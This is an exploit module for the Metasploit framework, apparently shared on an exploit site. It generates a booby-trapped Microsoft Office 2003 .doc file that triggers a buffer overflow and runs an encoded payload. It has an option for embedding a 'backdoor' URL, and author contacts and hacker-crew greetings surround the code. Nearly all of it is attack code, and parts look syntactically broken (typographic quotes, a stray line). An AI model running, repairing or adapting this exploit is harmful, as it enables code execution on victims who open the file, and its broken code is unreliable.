###
# Title : Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) – Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns
# platform : windows ( local BOF via MSF)
# Type : local exploit / Buffer Overflow / Metasploit
###
##
# | >> ——–+++=[ Dz Offenders Cr3w ]=+++——– << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ————————————————- < |
###
##
# $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $
##
require ”msf/core”
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
”Name” => ”Microsoft Office 2003 (.doc) Command Exec and local BOF”,
”Description” => %q{
This module exploits a buffer overflow in Microsoft Office 2003
and Command Exec With .doc file .
},
”License” => MSF_LICENSE,
”Author” =>
[
”b33f”,
”g11tch”,
”KedAns-Dz <ked-h[at]hotmail.com>” # MSF module
],
”Version” => ”1.0”,
”References” =>
[
[ ”URL”, ”http://exploit-db/exploits/18334” ],
],
”DefaultOptions” =>
{
”EXITFUNC” => ”process”,
},
”Payload” =>
{
”Space” => 1024,
”BadChars” => "”",
”EncoderType” => Msf::Encoder::Type::AlphanumMixed,
”EncoderOptions” =>
{
”BufferRegister” => ”ESI”,
}
},
”Platform” => ”win”,
”Targets” =>
[
[ ”Microsoft Office 2003 – MSWord (.doc Heap Spray)”, { ”Ret” => ”” } ],
],
”DisclosureDate” => ”JAN 08 2012”,
”DefaultTarget” => 0))
register_options(
[
OptString.new(”FILENAME”, [ true, ”The file name.”, ”msf.doc”]),
OptString.new(”URLBD”, [ true, ”URL From the Backdoor.”, ”http://”]),
], self.class)
end
def exploit
# Encode the url.
url = Rex::Text.to_unescape(datastore[”URLBD”])
# Header File
file =
"\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+
"\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+
"\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+
"\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+
"\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+
"\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+
"\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+
"\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+
"\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+
"\x66\x66\x66\x66\x66\x66\x66\x66"
# Buffer Overflow
buf = "\x23" * 501
buf << "\x30\x35"
 
; buf << "\x30" * 40
buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP – WINWORD.exe
buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2
buf << rand_text_alpha(42)
buf << "\x39\x30" * 18
buf << payload.encoded
# Create the doc
doc = file
doc << buf
doc << url
doc << "\x00"
doc << "{}}}}}}"
doc << "\x0d\x0a"
doc << "}"
print_status("Creating ”#{datastore[”FILENAME”]}” file…")
file_create(doc)
end
end
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================